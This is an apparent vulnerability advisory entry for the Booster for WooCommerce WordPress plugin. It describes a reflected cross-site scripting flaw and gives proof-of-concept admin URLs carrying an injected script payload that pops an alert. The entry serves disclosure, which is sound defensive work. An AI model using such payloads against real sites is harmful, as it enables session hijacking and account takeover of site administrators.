WordPress Plugin Vulnerabilities
Booster for WooCommerce < 5.6.2 - Reflected Cross-Site Scripting
Description
The plugin does not escape some generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting
Proof of Concept
v < 5.6.0 https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&a"><script>alert(/XSS/)</script> v < 5.6.2 (except 5.5.9): With the Orders module enabled, and "Admin Order Navigation" settings enabled: https://example.com/wp-admin/post.php?post=796&action=edit&a"><script>alert(/XSS/)</script>
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-04 (about 1 years ago)
Added
2022-07-04 (about 1 years ago)
Last Updated
2022-07-27 (about 1 years ago)